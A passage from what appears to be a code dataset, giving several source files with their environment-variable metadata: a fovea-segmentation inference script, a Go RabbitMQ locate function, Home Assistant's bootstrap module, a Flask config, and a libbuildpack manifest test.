os.environ["CUDA_VISIBLE_DEVICES"] = str(args.gpu)
new_dir = 'data/challenge/val/Fovea/stage1'
test_name_list = os.listdir('data/challenge/val/img')
input_size = [(384, 384), (512, 512), (640, 640)]
os.makedirs(new_dir, exist_ok=True)
os.makedirs(os.path.join(new_dir, 'predictions'), exist_ok=True)
model_paths = ['/home/zyw/refuge2/trained_models/Fovea/stage1/stage1_seg_unet_resnet101_bs16_nbo1_epoch150_fold0/best_dice.pth',
'/home/zyw/refuge2/trained_models/Fovea/stage1/stage1_seg_unet_resnet101_bs16_nbo1_epoch150_fold1/best_dice.pth',
'/home/zyw/refuge2/trained_models/Fovea/stage1/stage1_seg_unet_resnet101_bs16_nbo1_epoch150_fold2/best_dice.pth',
'/home/zyw/refuge2/trained_models/Fovea/stage1/stage1_seg_unet_resnet101_bs16_nbo1_epoch150_fold3/best_dice.pth',
'/home/zyw/refuge2/trained_models/Fovea/stage1/stage1_seg_unet_resnet101_bs16_nbo1_epoch150_fold4/best_dice.pth']
ImageName = []
Fovea_X = []
Fovea_Y = []
predictions_list = []
repeat_list = [0] * len(test_name_list)
for name in test_name_list:
img = cv2.imread(os.path.join('data/challenge/val/img', name), 0)
predictions_list.append(np.zeros(img.shape))
with torch.no_grad():
for model_path in model_paths:
if 'resnet34' in model_path:
net = smp.Unet('resnet34', in_channels=3, classes=1, activation=None, encoder_weights=None).cuda()
if 'resnet101' in model_path:
net = smp.Unet('resnet101', in_channels=3, classes=1, activation=None, encoder_weights=None).cuda()
net.load_state_dict(torch.load(model_path))
net.eval()
for i, name in enumerate(test_name_list):
print(i, name)
img = io.imread(os.path.join('data/challenge/val/img', name)) / 255
repeat = 0
pred_logits = np.zeros((img.shape[0], img.shape[1]))
for s in input_size:
img_resized = cv2.resize(img, (s[1], s[0]))
for t in range(4):
if t == 0:
img_resized_tta = np.flip(img_resized, axis=0)
if t == 1:
img_resized_tta = exposure.adjust_gamma(img_resized, 1.2)
if t == 2:
img_resized_tta = exposure.adjust_gamma(img_resized, 0.8)
if t == 3:
img_resized_tta = img_resized
img_resized_tta = np.ascontiguousarray(img_resized_tta)
data_one_tensor = torch.from_numpy(img_resized_tta).permute(2, 0, 1).unsqueeze(0).float().cuda()
predict_one_tensor = net(data_one_tensor)
predict_one_tensor = torch.sigmoid(predict_one_tensor)
predict_one_array = predict_one_tensor.cpu().squeeze(0).squeeze(0).detach().numpy()
if t == 0:
predict_one_array = np.flip(predict_one_array, axis=0)
if predict_one_array.max() > 0.5:
repeat += 1
predict_one_array = cv2.resize(predict_one_array, (img.shape[1], img.shape[0]))
pred_logits += predict_one_array
if repeat > 0:
pred_logits /= repeat
predictions_list[i] += pred_logits
repeat_list[i] += 1
for i, name in enumerate(test_name_list):
if repeat_list[i] > 0:
predictions_list[i] /= repeat_list[i]
_, predictions_list[i] = cv2.threshold(predictions_list[i], 0.5, 1, 0)
predictions_list[i] = keep_large_area(predictions_list[i], 1)
cv2.imwrite(os.path.join(os.path.join(new_dir, 'predictions', name.rstrip('.jpg') + '.png')), predictions_list[i] * 255)
prediction = predictions_list[i].astype(np.uint8)
connect_regions = label(prediction, connectivity=1, background=0)
props = regionprops(connect_regions)
Fovea_y, Fovea_x = props[0].centroid
Fovea_x = round(Fovea_x, 2)
Fovea_y = round(Fovea_y, 2)
ImageName.append(name)
Fovea_X.append(Fovea_x)
Fovea_Y.append(Fovea_y)
save = pd.DataFrame({'ImageName': ImageName, 'Fovea_X': Fovea_X, 'Fovea_Y': Fovea_Y})
save.to_csv(os.path.join(new_dir, 'fovea_location_results.csv'), index=False)
|
[] |
[] |
[
"CUDA_VISIBLE_DEVICES"
] |
[]
|
["CUDA_VISIBLE_DEVICES"]
|
python
| 1 | 0 | |
Source/apiServer/locate/locate.go
|
// 定位对象文件所在的数据服务器
package locate
import (
"encoding/json"
"lib/rabbitmq"
"lib/rs"
"lib/types"
"os"
"time"
)
// 向消息队列发布定位请求
func Locate(name string) (locateInfo map[int]string) {
q := rabbitmq.New(os.Getenv("RABBITMQ_SERVER"))
q.Publish("dataServers", name)
c := q.Consume()
go func() {
time.Sleep(time.Second)
q.Close()
}()
locateInfo = make(map[int]string)
for i := 0; i < rs.ALL_SHARDS; i++ {
msg := <-c
if len(msg.Body) == 0 {
return
}
var info types.LocateMessage
json.Unmarshal(msg.Body, &info)
locateInfo[info.Id] = info.Addr
}
return
}
func Exist(name string) bool {
return len(Locate(name)) >= rs.DATA_SHARDS
}
|
[
"\"RABBITMQ_SERVER\""
] |
[] |
[
"RABBITMQ_SERVER"
] |
[]
|
["RABBITMQ_SERVER"]
|
go
| 1 | 0 | |
homeassistant/bootstrap.py
|
"""Provide methods to bootstrap a Home Assistant instance."""
import asyncio
from collections import OrderedDict
import logging
import logging.handlers
import os
import sys
from time import time
from typing import Any, Dict, Optional, Set
import voluptuous as vol
from homeassistant import config as conf_util, config_entries, core, loader
from homeassistant.const import EVENT_HOMEASSISTANT_CLOSE
from homeassistant.exceptions import HomeAssistantError
from homeassistant.setup import async_setup_component
from homeassistant.util.logging import AsyncHandler
from homeassistant.util.package import async_get_user_site, is_virtual_env
from homeassistant.util.yaml import clear_secret_cache
_LOGGER = logging.getLogger(__name__)
ERROR_LOG_FILENAME = "home-assistant.log"
# hass.data key for logging information.
DATA_LOGGING = "logging"
DEBUGGER_INTEGRATIONS = {"ptvsd"}
CORE_INTEGRATIONS = ("homeassistant", "persistent_notification")
LOGGING_INTEGRATIONS = {"logger", "system_log"}
STAGE_1_INTEGRATIONS = {
# To record data
"recorder",
# To make sure we forward data to other instances
"mqtt_eventstream",
# To provide account link implementations
"cloud",
}
async def async_from_config_dict(
config: Dict[str, Any],
hass: core.HomeAssistant,
config_dir: Optional[str] = None,
enable_log: bool = True,
verbose: bool = False,
skip_pip: bool = False,
log_rotate_days: Any = None,
log_file: Any = None,
log_no_color: bool = False,
) -> Optional[core.HomeAssistant]:
"""Try to configure Home Assistant from a configuration dictionary.
Dynamically loads required components and its dependencies.
This method is a coroutine.
"""
start = time()
if enable_log:
async_enable_logging(hass, verbose, log_rotate_days, log_file, log_no_color)
hass.config.skip_pip = skip_pip
if skip_pip:
_LOGGER.warning(
"Skipping pip installation of required modules. " "This may cause issues"
)
core_config = config.get(core.DOMAIN, {})
try:
await conf_util.async_process_ha_core_config(hass, core_config)
except vol.Invalid as config_err:
conf_util.async_log_exception(config_err, "homeassistant", core_config, hass)
return None
except HomeAssistantError:
_LOGGER.error(
"Home Assistant core failed to initialize. "
"Further initialization aborted"
)
return None
# Make a copy because we are mutating it.
config = OrderedDict(config)
# Merge packages
await conf_util.merge_packages_config(
hass, config, core_config.get(conf_util.CONF_PACKAGES, {})
)
hass.config_entries = config_entries.ConfigEntries(hass, config)
await hass.config_entries.async_initialize()
await _async_set_up_integrations(hass, config)
stop = time()
_LOGGER.info("Home Assistant initialized in %.2fs", stop - start)
if sys.version_info[:3] < (3, 7, 0):
msg = (
"Python 3.6 support is deprecated and will "
"be removed in the first release after December 15, 2019. Please "
"upgrade Python to 3.7.0 or higher."
)
_LOGGER.warning(msg)
hass.components.persistent_notification.async_create(
msg, "Python version", "python_version"
)
return hass
async def async_from_config_file(
config_path: str,
hass: core.HomeAssistant,
verbose: bool = False,
skip_pip: bool = True,
log_rotate_days: Any = None,
log_file: Any = None,
log_no_color: bool = False,
) -> Optional[core.HomeAssistant]:
"""Read the configuration file and try to start all the functionality.
Will add functionality to 'hass' parameter.
This method is a coroutine.
"""
# Set config dir to directory holding config file
config_dir = os.path.abspath(os.path.dirname(config_path))
hass.config.config_dir = config_dir
if not is_virtual_env():
await async_mount_local_lib_path(config_dir)
async_enable_logging(hass, verbose, log_rotate_days, log_file, log_no_color)
await hass.async_add_executor_job(conf_util.process_ha_config_upgrade, hass)
try:
config_dict = await hass.async_add_executor_job(
conf_util.load_yaml_config_file, config_path
)
except HomeAssistantError as err:
_LOGGER.error("Error loading %s: %s", config_path, err)
return None
finally:
clear_secret_cache()
return await async_from_config_dict(
config_dict, hass, enable_log=False, skip_pip=skip_pip
)
@core.callback
def async_enable_logging(
hass: core.HomeAssistant,
verbose: bool = False,
log_rotate_days: Optional[int] = None,
log_file: Optional[str] = None,
log_no_color: bool = False,
) -> None:
"""Set up the logging.
This method must be run in the event loop.
"""
fmt = "%(asctime)s %(levelname)s (%(threadName)s) " "[%(name)s] %(message)s"
datefmt = "%Y-%m-%d %H:%M:%S"
if not log_no_color:
try:
from colorlog import ColoredFormatter
# basicConfig must be called after importing colorlog in order to
# ensure that the handlers it sets up wraps the correct streams.
logging.basicConfig(level=logging.INFO)
colorfmt = f"%(log_color)s{fmt}%(reset)s"
logging.getLogger().handlers[0].setFormatter(
ColoredFormatter(
colorfmt,
datefmt=datefmt,
reset=True,
log_colors={
"DEBUG": "cyan",
"INFO": "green",
"WARNING": "yellow",
"ERROR": "red",
"CRITICAL": "red",
},
)
)
except ImportError:
pass
# If the above initialization failed for any reason, setup the default
# formatting. If the above succeeds, this wil result in a no-op.
logging.basicConfig(format=fmt, datefmt=datefmt, level=logging.INFO)
# Suppress overly verbose logs from libraries that aren't helpful
logging.getLogger("requests").setLevel(logging.WARNING)
logging.getLogger("urllib3").setLevel(logging.WARNING)
logging.getLogger("aiohttp.access").setLevel(logging.WARNING)
# Log errors to a file if we have write access to file or config dir
if log_file is None:
err_log_path = hass.config.path(ERROR_LOG_FILENAME)
else:
err_log_path = os.path.abspath(log_file)
err_path_exists = os.path.isfile(err_log_path)
err_dir = os.path.dirname(err_log_path)
# Check if we can write to the error log if it exists or that
# we can create files in the containing directory if not.
if (err_path_exists and os.access(err_log_path, os.W_OK)) or (
not err_path_exists and os.access(err_dir, os.W_OK)
):
if log_rotate_days:
err_handler: logging.FileHandler = logging.handlers.TimedRotatingFileHandler(
err_log_path, when="midnight", backupCount=log_rotate_days
)
else:
err_handler = logging.FileHandler(err_log_path, mode="w", delay=True)
err_handler.setLevel(logging.INFO if verbose else logging.WARNING)
err_handler.setFormatter(logging.Formatter(fmt, datefmt=datefmt))
async_handler = AsyncHandler(hass.loop, err_handler)
async def async_stop_async_handler(_: Any) -> None:
"""Cleanup async handler."""
logging.getLogger("").removeHandler(async_handler) # type: ignore
await async_handler.async_close(blocking=True)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_CLOSE, async_stop_async_handler)
logger = logging.getLogger("")
logger.addHandler(async_handler) # type: ignore
logger.setLevel(logging.INFO)
# Save the log file location for access by other components.
hass.data[DATA_LOGGING] = err_log_path
else:
_LOGGER.error("Unable to set up error log %s (access denied)", err_log_path)
async def async_mount_local_lib_path(config_dir: str) -> str:
"""Add local library to Python Path.
This function is a coroutine.
"""
deps_dir = os.path.join(config_dir, "deps")
lib_dir = await async_get_user_site(deps_dir)
if lib_dir not in sys.path:
sys.path.insert(0, lib_dir)
return deps_dir
@core.callback
def _get_domains(hass: core.HomeAssistant, config: Dict[str, Any]) -> Set[str]:
"""Get domains of components to set up."""
# Filter out the repeating and common config section [homeassistant]
domains = set(key.split(" ")[0] for key in config.keys() if key != core.DOMAIN)
# Add config entry domains
domains.update(hass.config_entries.async_domains())
# Make sure the Hass.io component is loaded
if "HASSIO" in os.environ:
domains.add("hassio")
return domains
async def _async_set_up_integrations(
hass: core.HomeAssistant, config: Dict[str, Any]
) -> None:
"""Set up all the integrations."""
domains = _get_domains(hass, config)
# Start up debuggers. Start these first in case they want to wait.
debuggers = domains & DEBUGGER_INTEGRATIONS
if debuggers:
_LOGGER.debug("Starting up debuggers %s", debuggers)
await asyncio.gather(
*(async_setup_component(hass, domain, config) for domain in debuggers)
)
domains -= DEBUGGER_INTEGRATIONS
# Resolve all dependencies of all components so we can find the logging
# and integrations that need faster initialization.
resolved_domains_task = asyncio.gather(
*(loader.async_component_dependencies(hass, domain) for domain in domains),
return_exceptions=True,
)
# Set up core.
_LOGGER.debug("Setting up %s", CORE_INTEGRATIONS)
if not all(
await asyncio.gather(
*(
async_setup_component(hass, domain, config)
for domain in CORE_INTEGRATIONS
)
)
):
_LOGGER.error(
"Home Assistant core failed to initialize. "
"Further initialization aborted"
)
return
_LOGGER.debug("Home Assistant core initialized")
# Finish resolving domains
for dep_domains in await resolved_domains_task:
# Result is either a set or an exception. We ignore exceptions
# It will be properly handled during setup of the domain.
if isinstance(dep_domains, set):
domains.update(dep_domains)
# setup components
logging_domains = domains & LOGGING_INTEGRATIONS
stage_1_domains = domains & STAGE_1_INTEGRATIONS
stage_2_domains = domains - logging_domains - stage_1_domains
if logging_domains:
_LOGGER.info("Setting up %s", logging_domains)
await asyncio.gather(
*(async_setup_component(hass, domain, config) for domain in logging_domains)
)
# Kick off loading the registries. They don't need to be awaited.
asyncio.gather(
hass.helpers.device_registry.async_get_registry(),
hass.helpers.entity_registry.async_get_registry(),
hass.helpers.area_registry.async_get_registry(),
)
if stage_1_domains:
await asyncio.gather(
*(async_setup_component(hass, domain, config) for domain in stage_1_domains)
)
# Load all integrations
after_dependencies: Dict[str, Set[str]] = {}
for int_or_exc in await asyncio.gather(
*(loader.async_get_integration(hass, domain) for domain in stage_2_domains),
return_exceptions=True,
):
# Exceptions are handled in async_setup_component.
if isinstance(int_or_exc, loader.Integration) and int_or_exc.after_dependencies:
after_dependencies[int_or_exc.domain] = set(int_or_exc.after_dependencies)
last_load = None
while stage_2_domains:
domains_to_load = set()
for domain in stage_2_domains:
after_deps = after_dependencies.get(domain)
# Load if integration has no after_dependencies or they are
# all loaded
if not after_deps or not after_deps - hass.config.components:
domains_to_load.add(domain)
if not domains_to_load or domains_to_load == last_load:
break
_LOGGER.debug("Setting up %s", domains_to_load)
await asyncio.gather(
*(async_setup_component(hass, domain, config) for domain in domains_to_load)
)
last_load = domains_to_load
stage_2_domains -= domains_to_load
# These are stage 2 domains that never have their after_dependencies
# satisfied.
if stage_2_domains:
_LOGGER.debug("Final set up: %s", stage_2_domains)
await asyncio.gather(
*(async_setup_component(hass, domain, config) for domain in stage_2_domains)
)
# Wrap up startup
await hass.async_block_till_done()
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
config.py
|
################
# File: /config.py
# Project: flask-restplus-server-example
# Created Date: Tue Dec 10th 2019
# Author: Ashok Kumar P (ParokshaX) ([email protected])
# -----
# Last Modified: Sat Feb 8th 2020
# Modified By: Ashok Kumar P (ParokshaX) ([email protected])
# -----
# Copyright (c) <<projectCreationYear>> Your Company
#################
# pylint: disable=too-few-public-methods,invalid-name,missing-docstring
import os
class BaseConfig(object):
SECRET_KEY = "this-really-needs-to-be-changed"
PROJECT_ROOT = os.path.abspath(os.path.dirname(__file__))
# POSTGRESQL
# DB_USER = 'user'
# DB_PASSWORD = 'password'
# DB_NAME = 'restplusdb'
# DB_HOST = 'localhost'
# DB_PORT = 5432
# SQLALCHEMY_DATABASE_URI = 'postgresql://{user}:{password}@{host}:{port}/{name}'.format(
# user=DB_USER,
# password=DB_PASSWORD,
# host=DB_HOST,
# port=DB_PORT,
# name=DB_NAME,
# )
# SQLITE
SQLALCHEMY_DATABASE_URI = "sqlite:///%s" % (
os.path.join(PROJECT_ROOT, "example.db")
)
DEBUG = False
ERROR_404_HELP = False
REVERSE_PROXY_SETUP = os.getenv("EXAMPLE_API_REVERSE_PROXY_SETUP", False)
AUTHORIZATIONS = {
"oauth2_password": {
"type": "oauth2",
"flow": "password",
"scopes": {},
"tokenUrl": "/auth/oauth2/token",
},
# TODO: implement other grant types for third-party apps
#'oauth2_implicit': {
# 'type': 'oauth2',
# 'flow': 'implicit',
# 'scopes': {},
# 'authorizationUrl': '/auth/oauth2/authorize',
# },
}
ENABLED_MODULES = (
"auth",
"users",
"teams",
"site_user",
"api",
)
STATIC_ROOT = os.path.join(PROJECT_ROOT, "static")
SWAGGER_UI_JSONEDITOR = True
SWAGGER_UI_OAUTH_CLIENT_ID = "documentation"
SWAGGER_UI_OAUTH_REALM = (
"Authentication for Flask-RESTplus Example server documentation"
)
SWAGGER_UI_OAUTH_APP_NAME = "Flask-RESTplus Example server documentation"
# TODO: consider if these are relevant for this project
SQLALCHEMY_TRACK_MODIFICATIONS = True
CSRF_ENABLED = True
class ProductionConfig(BaseConfig):
SECRET_KEY = os.getenv("EXAMPLE_API_SERVER_SECRET_KEY")
SQLALCHEMY_DATABASE_URI = os.getenv("EXAMPLE_API_SERVER_SQLALCHEMY_DATABASE_URI")
class DevelopmentConfig(BaseConfig):
DEBUG = True
class TestingConfig(BaseConfig):
TESTING = True
# Use in-memory SQLite database for testing
SQLALCHEMY_DATABASE_URI = "sqlite://"
|
[] |
[] |
[
"EXAMPLE_API_SERVER_SECRET_KEY",
"EXAMPLE_API_REVERSE_PROXY_SETUP",
"EXAMPLE_API_SERVER_SQLALCHEMY_DATABASE_URI"
] |
[]
|
["EXAMPLE_API_SERVER_SECRET_KEY", "EXAMPLE_API_REVERSE_PROXY_SETUP", "EXAMPLE_API_SERVER_SQLALCHEMY_DATABASE_URI"]
|
python
| 3 | 0 | |
src/redis/vendor/github.com/cloudfoundry/libbuildpack/manifest_test.go
|
package libbuildpack_test
import (
"bytes"
"errors"
"io/ioutil"
"os"
"path/filepath"
"time"
"github.com/cloudfoundry/libbuildpack"
"github.com/cloudfoundry/libbuildpack/ansicleaner"
. "github.com/onsi/ginkgo"
. "github.com/onsi/gomega"
"gopkg.in/jarcoal/httpmock.v1"
)
var _ = Describe("Manifest", func() {
var (
manifest *libbuildpack.Manifest
manifestDir string
err error
version string
currentTime time.Time
buffer *bytes.Buffer
logger *libbuildpack.Logger
)
BeforeEach(func() {
manifestDir = "fixtures/manifest/standard"
currentTime = time.Now()
httpmock.Reset()
buffer = new(bytes.Buffer)
logger = libbuildpack.NewLogger(ansicleaner.New(buffer))
})
JustBeforeEach(func() {
manifest, err = libbuildpack.NewManifest(manifestDir, logger, currentTime)
Expect(err).To(BeNil())
})
Describe("NewManifest", func() {
It("has a language", func() {
Expect(manifest.Language()).To(Equal("dotnet-core"))
})
})
Describe("CheckStackSupport", func() {
var (
oldCfStack string
)
BeforeEach(func() { oldCfStack = os.Getenv("CF_STACK") })
AfterEach(func() { err = os.Setenv("CF_STACK", oldCfStack); Expect(err).To(BeNil()) })
Context("Stack is supported", func() {
BeforeEach(func() {
manifestDir = "fixtures/manifest/stacks"
err = os.Setenv("CF_STACK", "cflinuxfs2")
Expect(err).To(BeNil())
})
It("returns nil", func() {
Expect(manifest.CheckStackSupport()).To(Succeed())
})
Context("with no dependencies listed", func() {
BeforeEach(func() {
manifestDir = "fixtures/manifest/no-deps"
})
It("returns nil", func() {
Expect(manifest.CheckStackSupport()).To(Succeed())
})
})
Context("by a single dependency", func() {
BeforeEach(func() {
manifestDir = "fixtures/manifest/stacks"
err = os.Setenv("CF_STACK", "xenial")
Expect(err).To(BeNil())
})
It("returns nil", func() {
Expect(manifest.CheckStackSupport()).To(Succeed())
})
})
})
Context("Stack is not supported", func() {
BeforeEach(func() {
err = os.Setenv("CF_STACK", "notastack")
Expect(err).To(BeNil())
})
It("returns nil", func() {
Expect(manifest.CheckStackSupport()).To(MatchError(errors.New("required stack notastack was not found")))
})
})
})
Describe("Version", func() {
Context("VERSION file exists", func() {
It("returns the version", func() {
version, err = manifest.Version()
Expect(err).To(BeNil())
Expect(version).To(Equal("99.99"))
})
})
Context("VERSION file does not exist", func() {
BeforeEach(func() {
manifestDir = "fixtures/manifest/duplicate"
})
It("returns an error", func() {
version, err = manifest.Version()
Expect(version).To(Equal(""))
Expect(err).ToNot(BeNil())
Expect(err.Error()).To(ContainSubstring("unable to read VERSION file"))
})
})
})
Describe("AllDependencyVersions", func() {
It("returns all the versions of the dependency", func() {
versions := manifest.AllDependencyVersions("dotnet-framework")
Expect(err).To(BeNil())
Expect(versions).To(Equal([]string{"1.0.0", "1.0.1", "1.0.3", "1.1.0"}))
})
})
Describe("IsCached", func() {
BeforeEach(func() {
var err error
manifestDir, err = ioutil.TempDir("", "cached")
Expect(err).To(BeNil())
data, err := ioutil.ReadFile("fixtures/manifest/fetch/manifest.yml")
Expect(err).To(BeNil())
err = ioutil.WriteFile(filepath.Join(manifestDir, "manifest.yml"), data, 0644)
Expect(err).To(BeNil())
})
AfterEach(func() {
Expect(os.RemoveAll(manifestDir)).To(Succeed())
})
Context("uncached", func() {
It("is false", func() {
Expect(manifest.IsCached()).To(BeFalse())
})
})
Context("cached", func() {
BeforeEach(func() {
dependenciesDir := filepath.Join(manifestDir, "dependencies")
Expect(os.MkdirAll(dependenciesDir, 0755)).To(Succeed())
})
It("is true", func() {
Expect(manifest.IsCached()).To(BeTrue())
})
})
})
Describe("FetchDependency", func() {
var tmpdir, outputFile string
BeforeEach(func() {
manifestDir = "fixtures/manifest/fetch"
tmpdir, err = ioutil.TempDir("", "downloads")
Expect(err).To(BeNil())
outputFile = filepath.Join(tmpdir, "out.tgz")
})
AfterEach(func() { err = os.RemoveAll(tmpdir); Expect(err).To(BeNil()) })
Context("uncached", func() {
Context("url exists and matches md5", func() {
BeforeEach(func() {
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-1-linux-x64.tgz",
httpmock.NewStringResponder(200, "exciting binary data"))
})
It("downloads the file to the requested location", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputFile)
Expect(err).To(BeNil())
Expect(ioutil.ReadFile(outputFile)).To(Equal([]byte("exciting binary data")))
})
It("makes intermediate directories", func() {
outputFile = filepath.Join(tmpdir, "notexist", "out.tgz")
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputFile)
Expect(err).To(BeNil())
Expect(ioutil.ReadFile(outputFile)).To(Equal([]byte("exciting binary data")))
})
})
Context("url returns 404", func() {
BeforeEach(func() {
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-1-linux-x64.tgz",
httpmock.NewStringResponder(404, "exciting binary data"))
})
It("raises error", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputFile)
Expect(err).ToNot(BeNil())
})
It("alerts the user that the url could not be downloaded", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputFile)
Expect(err).NotTo(BeNil())
Expect(err.Error()).To(ContainSubstring("could not download: 404"))
Expect(buffer.String()).ToNot(ContainSubstring("to ["))
})
It("outputfile does not exist", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputFile)
Expect(outputFile).ToNot(BeAnExistingFile())
})
})
Context("url exists but does not match md5", func() {
BeforeEach(func() {
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-1-linux-x64.tgz",
httpmock.NewStringResponder(200, "other data"))
})
It("raises error", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputFile)
Expect(err).ToNot(BeNil())
})
It("outputfile does not exist", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "1"}, outputFile)
Expect(outputFile).ToNot(BeAnExistingFile())
})
})
})
Context("cached", func() {
var dependenciesDir string
BeforeEach(func() {
var err error
manifestDir, err = ioutil.TempDir("", "cached")
Expect(err).To(BeNil())
dependenciesDir = filepath.Join(manifestDir, "dependencies")
os.MkdirAll(dependenciesDir, 0755)
data, err := ioutil.ReadFile("fixtures/manifest/fetch/manifest.yml")
Expect(err).To(BeNil())
err = ioutil.WriteFile(filepath.Join(manifestDir, "manifest.yml"), data, 0644)
Expect(err).To(BeNil())
outputFile = filepath.Join(tmpdir, "out.tgz")
})
Context("url exists cached on disk under old format and matches md5", func() {
BeforeEach(func() {
ioutil.WriteFile(filepath.Join(dependenciesDir, "https___example.com_dependencies_thing-2-linux-x64.tgz"), []byte("awesome binary data"), 0644)
})
It("copies the cached file to outputFile", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(err).To(BeNil())
Expect(ioutil.ReadFile(outputFile)).To(Equal([]byte("awesome binary data")))
})
It("makes intermediate directories", func() {
outputFile = filepath.Join(tmpdir, "notexist", "out.tgz")
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(err).To(BeNil())
Expect(ioutil.ReadFile(outputFile)).To(Equal([]byte("awesome binary data")))
})
})
Context("url exists cached on disk under new format and matches md5", func() {
BeforeEach(func() {
os.MkdirAll(filepath.Join(dependenciesDir, "c4fef5682adf1c19c7f9b76fde9d0ecb"), 0755)
Expect(ioutil.WriteFile(filepath.Join(dependenciesDir, "c4fef5682adf1c19c7f9b76fde9d0ecb", "thing-2-linux-x64.tgz"), []byte("awesome binary data"), 0644)).To(Succeed())
})
It("copies the cached file to outputFile", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(err).To(BeNil())
Expect(ioutil.ReadFile(outputFile)).To(Equal([]byte("awesome binary data")))
})
It("makes intermediate directories", func() {
outputFile = filepath.Join(tmpdir, "notexist", "out.tgz")
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(err).To(BeNil())
Expect(ioutil.ReadFile(outputFile)).To(Equal([]byte("awesome binary data")))
})
})
Context("url exists cached on disk under old format and does not match md5", func() {
BeforeEach(func() {
ioutil.WriteFile(filepath.Join(dependenciesDir, "https___example.com_dependencies_thing-2-linux-x64.tgz"), []byte("different binary data"), 0644)
})
It("raises error", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(err).ToNot(BeNil())
})
It("outputfile does not exist", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(outputFile).ToNot(BeAnExistingFile())
})
})
Context("url exists cached on disk under new format and does not match md5", func() {
BeforeEach(func() {
os.MkdirAll(filepath.Join(dependenciesDir, "c4fef5682adf1c19c7f9b76fde9d0ecb"), 0755)
Expect(ioutil.WriteFile(filepath.Join(dependenciesDir, "c4fef5682adf1c19c7f9b76fde9d0ecb", "thing-2-linux-x64.tgz"), []byte("different binary data"), 0644)).To(Succeed())
})
It("raises error", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(err).ToNot(BeNil())
})
It("outputfile does not exist", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(outputFile).ToNot(BeAnExistingFile())
})
})
Context("url is not cached on disk", func() {
It("raises error", func() {
err = manifest.FetchDependency(libbuildpack.Dependency{Name: "thing", Version: "2"}, outputFile)
Expect(err).ToNot(BeNil())
})
})
})
})
Describe("InstallDependency", func() {
var outputDir string
BeforeEach(func() {
manifestDir = "fixtures/manifest/fetch"
outputDir, err = ioutil.TempDir("", "downloads")
Expect(err).To(BeNil())
})
AfterEach(func() {
err = os.RemoveAll(outputDir)
Expect(err).To(BeNil())
})
Context("uncached", func() {
Context("url exists and matches md5", func() {
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/real_tar_file-3-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
It("logs the name and version of the dependency", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_tar_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring("-----> Installing real_tar_file 3"))
})
It("extracts a file at the root", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_tar_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(filepath.Join(outputDir, "root.txt")).To(BeAnExistingFile())
Expect(ioutil.ReadFile(filepath.Join(outputDir, "root.txt"))).To(Equal([]byte("root\n")))
})
It("extracts a nested file", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_tar_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(filepath.Join(outputDir, "thing", "bin", "file2.exe")).To(BeAnExistingFile())
Expect(ioutil.ReadFile(filepath.Join(outputDir, "thing", "bin", "file2.exe"))).To(Equal([]byte("progam2\n")))
})
It("makes intermediate directories", func() {
outputDir = filepath.Join(outputDir, "notexist")
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "real_tar_file", Version: "3"}, outputDir)
Expect(err).To(BeNil())
Expect(filepath.Join(outputDir, "thing", "bin", "file2.exe")).To(BeAnExistingFile())
Expect(ioutil.ReadFile(filepath.Join(outputDir, "thing", "bin", "file2.exe"))).To(Equal([]byte("progam2\n")))
})
Context("version is NOT latest in version line", func() {
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-6.2.2-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
It("warns the user", func() {
patchWarning := "**WARNING** A newer version of thing is available in this buildpack. " +
"Please adjust your app to use version 6.2.3 instead of version 6.2.2 as soon as possible. " +
"Old versions of thing are only provided to assist in migrating to newer versions.\n"
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "6.2.2"}, outputDir)
Expect(err).To(BeNil())
Expect(buffer.String()).To(ContainSubstring(patchWarning))
})
})
Context("version is latest in version line", func() {
BeforeEach(func() {
tgzContents, err := ioutil.ReadFile("fixtures/thing.tgz")
Expect(err).To(BeNil())
httpmock.RegisterResponder("GET", "https://example.com/dependencies/thing-6.2.3-linux-x64.tgz",
httpmock.NewStringResponder(200, string(tgzContents)))
})
It("does not warn the user", func() {
err = manifest.InstallDependency(libbuildpack.Dependency{Name: "thing", Version: "6.2.3"}, outputDir)
Expect(err).To(BeNil())
